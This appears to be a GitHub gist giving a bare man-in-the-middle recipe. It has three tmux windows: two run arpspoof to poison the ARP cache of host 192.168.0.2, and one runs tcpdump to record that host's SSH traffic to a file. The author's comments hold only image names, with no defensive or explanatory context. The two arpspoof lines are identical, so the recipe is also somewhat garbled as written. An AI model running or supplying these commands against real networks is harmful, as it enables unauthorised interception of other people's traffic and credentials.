Skip to content

Instantly share code, notes, and snippets.

@Rajchowdhury420
Created June 27, 2024 13:50
Show Gist options
  • Save Rajchowdhury420/f51526a384fc44f592b94daeb9ef1d35 to your computer and use it in GitHub Desktop.
Save Rajchowdhury420/f51526a384fc44f592b94daeb9ef1d35 to your computer and use it in GitHub Desktop.

Tmux window 0

arpspoof -i eth0 -t 192.168.0.2 192.168.0.99

Tmux window 1

arpspoof -i eth0 -t 192.168.0.2 192.168.0.99

Tmux window 2

tcpdump -i eth0 host 192.168.0.2 and port 22 -w capture.pcap
@Rajchowdhury420
Copy link
Author

C842B3CB-8BA5-431F-83B2-DF2A1EA45F08_4_5005_c
53AFFF5B-9AE1-4169-892F-B314914EBD20_4_5005_c

@Rajchowdhury420
Copy link
Author

image

@Rajchowdhury420
Copy link
Author

image

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment